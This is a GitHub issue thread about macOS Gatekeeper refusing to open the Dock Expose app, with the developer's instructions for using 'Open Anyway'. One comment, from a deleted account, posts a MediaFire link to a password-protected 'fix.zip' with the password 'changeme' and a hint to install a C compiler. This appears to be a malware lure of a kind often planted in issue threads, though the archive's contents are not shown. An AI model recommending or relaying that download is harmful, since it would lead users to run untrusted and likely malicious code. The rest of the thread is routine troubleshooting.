### ISSUE TITLE
"Dock Expose can't be opened because Apple cannot check it for malicious software"

### ISSUE THREAD

**Issue by tail-recursion** [steventheworker/Dock-Expos--home#32]
I get this error message "Dock Expose can't be opened because Apple cannot check it for malicious software" when I try to open Dock Expose v3.00.5 on M1 Max Sonoma 14.5.

**Comment by steventheworker** [comment]
If you open an app from a developer without an active Apple dev license, it will show this error, unless you bypass Apple's 'gatekeeper'.

**Bypass Gatekeeper:** After opening the app, in the list of permissions, which can be found in Settings.app (ie: Accessibility, Screen Recording etc.), scroll down, and you will find a button that says "Open Anyway".

**Comment by ghost** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme

you may need to install the c compiler

**Comment by blowsie** [comment]
> If you open an app from a developer without an active Apple dev license, it will show this error, unless you bypass Apple's 'gatekeeper'.

This didnt work for me despite providing admin credentials

**Comment by steventheworker** [comment]
@blowsie 

[Just verifying you followed these steps to bypass gatekeeper (youtube)](https://www.youtube.com/watch?v=JwWIbnNUkBg)
You will know if you bypassed gatekeeper if you get a window asking for permissions for Dock Exposé, or if the below icon is added to the menubar.
<img width="287" alt="Image" src="https://github.com/user-attachments/assets/6e7c2c02-648d-462c-8790-3e7485f0792a" />
